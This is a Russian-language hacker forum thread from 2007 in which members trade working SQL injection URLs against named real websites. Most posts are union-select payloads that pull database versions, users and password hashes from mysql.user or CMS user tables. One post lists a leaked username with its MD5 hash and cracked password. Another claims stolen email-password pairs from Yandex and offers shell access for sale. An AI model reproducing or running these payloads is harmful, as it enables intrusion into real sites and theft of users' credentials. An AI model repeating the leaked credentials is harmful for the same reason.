SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    мдя, почему 1,2,3? )
    http://www.foodforfun.ru/self.php?id=122+union+select+version(),2

    mr. nitrox, вы лентяй, там нечего думать ) внизу же написано что xoops.. da i newbb стоит..

    http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+xoops_users+where+uid=1/*
    http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+xoops_users+where+uid=4/*
    piggy{AZ}:edc52ca4fc24580fec8c11d6b7c5859e
    piggy{AZ}:celebes

    короч, чистый мд5 там.
     
    _________________________
    5 people like this.
  2. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://www.fish.bc.ca/news.php?news_id=-78+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*
     
    1 person likes this.
  3. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.style2ouf.com/us/News/affiche_news.php?id_news=-1+union+select+concat(user,char(58),password),2,3,4,5,6,7+from+mysql.user/*
    Code:
    http://www.tamizdat.org/article.php?id=99999+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
     
    4 people like this.
  4. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.vtb.no/vis.php?id=-3217+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(password,0x3a,user),0x71),0x71),4,5,6,7,8,9,10,11+from+mysql.user+limit+5,1/*
    Code:
    http://www.rushprint.no/artikkel.php?id=-889+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14/*
    
    Code:
    http://www.trondelag-teater.no/forestilling.php?id=-842+union+select+1,version()/*
     
    #1524 XTErner, 1 Apr 2007
    Last edited: 1 Apr 2007
    4 people like this.
  5. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    яндек с.ру :)

    показываю только багу, кому интересно - добивайте дальше.
    http://tv.yandex.ru/broadcast.xml?id=8043801-1 выдает тоже самое что и
    http://tv.yandex.ru/broadcast.xml?id=8043800
    описывать дальнейшие действия как использовать скулю не буду, но кто желает купить шелл - в приват. есть доступ к бд, в общем все блага. ДОРОГО!
    кому интересно, выцепил из БД пару сотен мыльников с пассами вида pass:login:s_question:s_answer

    http://c411k.jino-net.ru/upload/yand.php
     
    _________________________
    5 people like this.
  6. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Там стоит IPB, префикс таблиц ibf_ , но запрос с "from" не проходит =\

    С этим ХЗ как бороться...

     
    #1526 Fr-Ron, 1 Apr 2007
    Last edited: 1 Apr 2007
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://medichelp.ru/?category=394&page=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
    Code:
    http://www.dengi-info.com/news/?nid=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char)/*
    Code:
    http://www.salespb.ru/rubr.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
     
    2 people like this.
  8. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.gamersinfo.net/content/news.php?id=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9+from+user+limit+0,1/*
    Code:
    http://www.rolemancer.ru/sections.php?op=listarticles&secid=-1+union+select+concat(pass,char(58),uname),2,3,4,5+from+users/*
     
    2 people like this.
  9. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.shopwell.ru/catalogue/tualet-cabine/?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15/*
    Code:
    http://www.553333.ru/towar.phtml?id_towar=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
     
    2 people like this.
  10. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://www.outside-music.ca/news.php?id=-38+union+select+1,2,3,4,user(),version(),7,database(),9,10,11,12,13/*
     
  11. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Обещал Грею на 1 апреля выложить стилизованную скулю =)
    Code:
    http://yalma.raokriomrati.com/main.html?id=-1+объединение+выбор+конкат(версия(),двоеточие,пользователь()),конкат_вс(двоеточие,пользователь,пасс)+из+пользователей/*
    Оригинал, кстати достаточно гладко
    Code:
    http://yalma.raokriomrati.com/main.html?id=-1+union+select+concat(version(),char(58),user()),concat_ws(char(58),user,pass)+from+users/*
     
    4 people like this.
  12. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.filippok.ru/index.php?s=33&t=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12,13/*
     
    2 people like this.
  13. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://www.la-belle.nl/nieuws/main.html?id=-17+union+select+convert(version()+using+latin1)/*&pos=0
     
    3 people like this.
  14. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Магазин, таблицы не осилил =(

     
    2 people like this.
  15. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://fri.net.ua/loadpsb.php?id=-520+union+select+1,2,3,4,5,6,7,8,9/*
    Code:
    http://pravopys.vlada.kiev.ua/index.php?id=-12+union+select+version()/*
     
    2 people like this.
  16. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.parkmanmusik.se/shop.php?id=-1+union+select+1,version(),3,4/*
     
    4 people like this.
  17. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    С е р в и с ы д л я В е б П р о ф е с с и о н а л о в
     
    2 people like this.
  18. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Кто хочет учиться зарубежом?
     
    1 person likes this.
  19. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    В Киевском международном соц. институте хочу:) :
     
    2 people like this.
  20. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    shops
    Code:
    http://www.theracersgroup.com/shop/car.php?id=-19%20UNION%20SELECT%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
    
    Code:
    http://www.kuchikomi-kobe.com/shop.php?id=-8%20UNION%20SELECT%201,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*
    мало того,что иероглифы какието,так еще и таблиц не подобрал=\
     
    1 person likes this.
Thread Status:
Not open for further replies.